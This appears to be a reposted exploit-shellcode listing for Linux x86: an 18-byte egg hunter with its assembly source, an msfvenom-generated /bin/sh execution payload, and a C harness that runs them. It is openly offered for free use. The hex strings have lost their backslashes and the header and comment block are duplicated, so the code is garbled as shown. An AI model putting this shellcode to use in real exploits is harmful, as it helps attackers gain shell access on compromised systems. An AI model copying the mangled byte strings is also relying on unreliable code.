// Description: a 18 bytes egg hunter on contigous memory segments
//
// You are free to do whatever you want of this shellcode
//
// @phackt_ul
/*
global _start // Description: a 18 bytes egg hunter on contigous memory segments
//
// You are free to do whatever you want of this shellcode
//
// @phackt_ul
/*
global _start
section .text
_start:
mov eax, _start ; we set a valid .text address into eax
mov ebx, dword 0x50905091 ; we can avoid an 8 bytes tag in egg if the tag
dec ebx ; can not be found in the egg hunter, that's why we decrement to look for
; 0x50905090 - push eax, nop, push eax, nop
next_addr:
inc eax
cmp dword [eax], ebx ; do we found the tag ?
jne next_addr
jmp eax ; yes we do so we jump to the egg
*/
#include <stdio.h>
#include <string.h>
unsigned char egghunter[] =
"xb8x60x80x04x08xbbx91x50x90x50x4bx40x39x18x75xfbxffxe0";
unsigned char egg[] =
"x90x50x90x50" // egg mark - do not remove
"xbdx64xb2x0cxf4xdaxc2xd9x74x24xf4x5ax31xc9xb1" // msfvenom -p linux/x86/exec CMD=/bin/sh -f c -b x00
"x0bx83xc2x04x31x6ax11x03x6ax11xe2x91xd8x07xac"
"xc0x4fx7ex24xdfx0cxf7x53x77xfcx74xf4x87x6ax54"
"x66xeex04x23x85xa2x30x3bx4ax42xc1x13x28x2bxaf"
"x44xdfxc3x2fxccx4cx9axd1x3fxf2";
void main()
{
printf("Egg hunter shellcode Length: %d
", strlen(egghunter));
printf("Egg shellcode Length: %d
", strlen(egg));
int (*ret)() = (int(*)())egghunter;
ret();
}
Linux x86 Egg-Hunter Shellcode
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 817